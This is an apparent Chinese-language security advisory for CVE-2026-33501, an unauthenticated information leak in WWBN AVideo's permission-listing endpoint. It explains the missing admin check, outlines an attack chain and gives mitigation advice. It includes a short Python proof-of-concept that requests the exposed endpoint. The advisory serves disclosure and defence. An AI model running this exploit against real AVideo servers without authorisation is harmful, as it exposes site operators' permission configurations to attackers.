CVE-2026-33501 CVSS 5.3 中危

CVE-2026-33501: AVideo权限矩阵信息泄露漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33501

漏洞类型

信息泄露 / 访问控制失效

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo是一个开源视频平台。在26.0及之前版本中，`plugin/Permissions/View/Users_groups_permissions/list.json.php`接口存在安全漏洞。该端点缺乏身份验证和授权检查，允许未经身份验证的攻击者获取完整的用户组与插件权限映射矩阵。这可能导致敏感权限配置信息泄露，帮助攻击者进一步规划攻击路径。同目录下的其他端点均正确实现了管理员权限检查，表明此为代码遗漏。

技术细节

该漏洞的根本原因在于`plugin/Permissions/View/Users_groups_permissions/list.json.php`文件未实施任何访问控制机制。正常情况下，涉及权限管理的敏感接口（如同目录下的add.json.php和delete.json.php）都会调用`User::isAdmin()`进行权限验证，确保只有管理员才能访问。然而，`list.json.php`文件遗漏了这一关键检查，导致该接口直接暴露在公网。攻击者无需登录账户或进行用户交互，即可通过向该端点发送HTTP GET请求，获取系统内所有用户组对应的插件权限列表。这种信息泄露虽然不直接导致系统被入侵，但暴露了系统的权限架构，降低了后续攻击的难度，属于典型的访问控制失效（Broken Access Control）漏洞。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统使用的是WWBN AVideo平台，且版本在26.0或以下。

STEP 2

漏洞利用

攻击者构造HTTP GET请求，直接访问`/plugin/Permissions/View/Users_groups_permissions/list.json.php`端点。

STEP 3

信息获取

由于未校验权限，服务器返回JSON格式的完整用户组与插件权限映射数据，攻击者成功获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
# The vulnerable endpoint allows unauthenticated access to the permission matrix
target_url = "http://target_host/plugin/Permissions/View/Users_groups_permissions/list.json.php"

try:
    # Send GET request without authentication headers
    response = requests.get(target_url)

    if response.status_code == 200:
        print("[+] Exploit successful! Permission data retrieved:")
        print(response.json())
    else:
        print("[-] Request failed or endpoint not reachable.")
except Exception as e:
    print(f"Error: {e}")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

如果无法立即升级，建议在Web服务器（如Nginx或Apache）层面配置访问控制规则，禁止直接访问`plugin/Permissions/View/Users_groups_permissions/list.json.php`路径，或限制仅内网IP访问，直到完成版本更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表